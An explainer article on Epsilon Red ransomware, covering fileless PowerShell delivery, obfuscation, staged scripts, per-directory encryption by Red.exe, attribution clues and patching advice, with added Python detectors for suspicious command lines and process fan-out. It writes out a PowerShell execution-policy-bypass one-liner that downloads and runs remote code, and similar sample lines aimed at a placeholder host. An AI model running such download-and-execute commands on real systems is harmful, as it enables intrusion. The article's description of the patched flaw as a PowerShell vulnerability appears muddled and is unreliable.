What is Epsilon Red Ransomware?
Named after a little-known villain from the Marvel comics, Epsilon Red was recently discovered by the cybersecurity company Sophos. Since its discovery, the ransomware has attacked numerous organizations around the world.
Fileless ransomware 'hides' in PowerShell
Fileless malware is malware that runs by piggybacking on legitimate software already present on the system instead of dropping its own executable. PowerShell-based fileless malware relies on PowerShell's ability to load and run code directly in the device's memory, which helps the malicious script evade detection.
Normally, before a script runs it must first be written to the device's drive, which gives endpoint security solutions a file to inspect. Because PowerShell can run code in memory outside that standard script-execution path, it can slip past such endpoint security. In addition, passing the bypass parameter to PowerShell lets an attacker circumvent the restrictions that PowerShell's execution policy would otherwise place on running the script.
An example of a PowerShell command line using bypass parameters:
powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('url'))
As you can see, assembling such a bypass command line is relatively easy: -ep Bypass disables the execution policy check, -nop skips loading the user profile, and -c iex executes the downloaded string in memory without ever writing it to disk.
In response, Microsoft released a patch addressing the PowerShell-related remote code execution vulnerability. However, patches are only effective when they are applied. Many organizations have relaxed their patching standards, leaving their environments exposed to attack, and Epsilon Red is designed to take advantage of exactly that weakness.
Epsilon Red's dual usefulness
Because Epsilon Red is most effective against unpatched Microsoft servers, the malware serves the attacker both as ransomware and as a probe of the target's defences. Whether or not Epsilon Red succeeds in an environment tells the attacker something about the security capabilities of the target.
If Epsilon Red successfully reaches a Microsoft Exchange Server, it indicates that the organization is not following basic patching best practices, and it shows the attacker how easily the rest of the target's environment can be infiltrated.
Epsilon Red uses obfuscation to hide its payload. Obfuscation makes code hard to read and is used in PowerShell malware because plain PowerShell scripts are otherwise highly readable. Obfuscated scripts rely on PowerShell's cmdlet aliases and similar tricks so that anti-virus software has a harder time recognising malicious commands in PowerShell logs.
Obfuscated PowerShell scripts can still be identified, however. A common indicator of a PowerShell-based attack is the creation of a WebClient object: the attacker creates one in the PowerShell code to open an outbound connection to a remote URL hosting malicious code.
If an organization is compromised, it is very unlikely to have enough security measures in place to detect obfuscated PowerShell scripts. Conversely, if Epsilon Red fails to penetrate the server, that tells the attacker the target's defences can decode the PowerShell malware quickly, making the attack less valuable.
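As an added illustration (not code from the article or from Sophos), the following Python heuristic scores PowerShell command lines of the kind recorded in process-creation or Script Block logs, expanding aliases and ignoring case so that the obfuscation tricks described above do not hide the WebClient creation and bypass flags. The sample lines, the indicator weights and the alert threshold are constructed for this example.

```python
import re

# Constructed sample PowerShell command lines (not taken from the article): a benign
# admin command, the bypass-style downloader, an encoded command, and a case-mangled
# variant of the downloader. The URLs and the base64 blob are placeholders.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -Command Get-Service -Name Spooler",
    "powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/1.ps1'))",
    "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "powershell.exe -nop -c \"IEX (nEw-oBjEcT nEt.wEbClIeNt).dOwNlOaDsTrInG('http://example.invalid/x')\"",
]

# Aliases an attacker uses to make the command line less readable. Expanding them
# first lets one rule cover both 'iex' and 'Invoke-Expression'.
ALIASES = {r"\biex\b": "invoke-expression", r"\biwr\b": "invoke-webrequest"}

# (regex, weight, label) indicators; the score is the sum of matched weights.
INDICATORS = [
    (r"-e(?:p|xecutionpolicy)\s+bypass", 3, "execution policy bypass"),
    (r"-nop\b|-noprofile\b", 1, "profile skipped"),
    (r"-w(?:indowstyle)?\s+hidden", 2, "hidden window"),
    (r"-e(?:nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}", 3, "encoded command"),
    (r"invoke-expression", 2, "Invoke-Expression"),
    (r"net\.webclient", 3, "WebClient object created"),
    (r"downloadstring|downloadfile", 3, "remote download"),
]

def normalise(cmd: str) -> str:
    """Lower-case the command line (defeats cAsE mangling) and expand aliases."""
    text = cmd.lower()
    for pattern, full in ALIASES.items():
        text = re.sub(pattern, full, text)
    return text

def score_command(cmd: str) -> tuple[int, list[str]]:
    """Return (score, matched indicator labels) for one command line."""
    text = normalise(cmd)
    matched = [(w, label) for pattern, w, label in INDICATORS if re.search(pattern, text)]
    return sum(w for w, _ in matched), [label for _, label in matched]

def suspicious(cmd: str, threshold: int = 5) -> bool:
    """Flag a command line once enough indicators stack up (threshold is a tuning choice)."""
    return score_command(cmd)[0] >= threshold

if __name__ == "__main__":
    for cmd in SAMPLE_COMMAND_LINES:
        score, labels = score_command(cmd)
        print(f"{'ALERT' if suspicious(cmd) else 'ok   '} score={score:2d} {labels}")
```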
Epsilon Red's Cyber Invasion
Epsilon Red's mode of operation is very simple. It uses a series of PowerShell scripts, numbered 1.ps1 to 12.ps1, to infiltrate servers. Each script prepares the target server for the final payload.
Every PowerShell script in Epsilon Red has a purpose. One is designed to alter the target's network firewall rules; another is designed to uninstall the target's anti-virus software.
As you might have guessed, these scripts work in sync to ensure that once the payload is delivered, the target won't be able to quickly stop its progress.
Transmission of payload
Once Epsilon Red's PowerShell scripts have paved the way, the final payload is delivered as an executable, Red.exe. On the server, Red.exe scans the file system and builds a list of directory paths for every file it finds. It then spawns a child process from the main malware file for each directory path in the list, and each child encrypts the files under its assigned directory.
After all directory paths in Epsilon Red's list have been encrypted, a .txt ransom note is left to notify the target and state the attacker's demand. Any accessible network nodes connected to the compromised host are then targeted as well, increasing the chance that the malware spreads across the network.
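The per-directory worker pattern just described is something a defender can look for in process-creation telemetry: one image spawning many copies of itself, each with a different directory argument. The following Python check is an added example, not the article's or Sophos's code; the event records, the red.exe path and the min_children threshold are constructed here.

```python
from collections import defaultdict

# Constructed process-creation records (not from the article), shaped like the fields
# in Sysmon Event ID 1 / Windows 4688: the suspicious parent (pid 500) launches copies
# of itself with a different directory argument each time; the backup tool does not.
EVENTS = [
    {"pid": 400, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Users\Public\red.exe", "cmdline": "red.exe"},
    {"pid": 501, "ppid": 500, "image": r"C:\Users\Public\red.exe", "cmdline": r'red.exe "C:\Users\alice\Documents"'},
    {"pid": 502, "ppid": 500, "image": r"C:\Users\Public\red.exe", "cmdline": r'red.exe "C:\Users\alice\Pictures"'},
    {"pid": 503, "ppid": 500, "image": r"C:\Users\Public\red.exe", "cmdline": r'red.exe "C:\Shares\Finance"'},
    {"pid": 504, "ppid": 500, "image": r"C:\Users\Public\red.exe", "cmdline": r'red.exe "C:\Shares\HR"'},
    {"pid": 505, "ppid": 500, "image": r"C:\Users\Public\red.exe", "cmdline": r'red.exe "D:\Backups"'},
    {"pid": 600, "ppid": 400, "image": r"C:\Program Files\Backup\bk.exe", "cmdline": "bk.exe --full"},
    {"pid": 601, "ppid": 600, "image": r"C:\Program Files\Backup\bk.exe", "cmdline": r'bk.exe "D:\Data"'},
]

def directory_argument(cmdline: str) -> str:
    """Return the first argument after the image name, with surrounding quotes removed."""
    parts = cmdline.split(" ", 1)
    return parts[1].strip().strip('"') if len(parts) == 2 else ""

def find_self_fanout(events, min_children: int = 4) -> dict[int, list[str]]:
    """Map parent PID -> sorted distinct directory arguments for every process that
    spawned at least min_children copies of its own image with differing arguments.
    min_children is a tuning threshold chosen for this example."""
    by_pid = {e["pid"]: e for e in events}
    child_args = defaultdict(set)
    for e in events:
        parent = by_pid.get(e["ppid"])
        # Only count children that are the same image as their parent.
        if parent is None or parent["image"].lower() != e["image"].lower():
            continue
        arg = directory_argument(e["cmdline"])
        if arg:
            child_args[e["ppid"]].add(arg)
    return {ppid: sorted(args) for ppid, args in child_args.items() if len(args) >= min_children}

if __name__ == "__main__":
    for ppid, dirs in find_self_fanout(EVENTS).items():
        print(f"pid {ppid} spawned {len(dirs)} per-directory workers: {dirs}")
```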
Who is behind Epsilon Red?
The identity of the attackers behind Epsilon Red is still unknown, but some clues hint at their origin. The first is the malware's name: Epsilon Red is an X-Men villain with a Russian origin story.
The second clue is the ransom note in the .txt file the malware leaves behind, which resembles the note used by the ransomware gang REvil. This similarity does not, however, show that the attackers are members of that gang: REvil runs a RaaS (Ransomware-as-a-Service) operation in which affiliates pay REvil for access to its malware.
Protect yourself from Epsilon Red
So far, Epsilon Red has successfully infiltrated unpatched servers. One of the best defences against Epsilon Red and similar ransomware is therefore to keep your environment properly patched and managed. In addition, a security solution that can quickly de-obfuscate PowerShell scripts is a useful addition to your environment.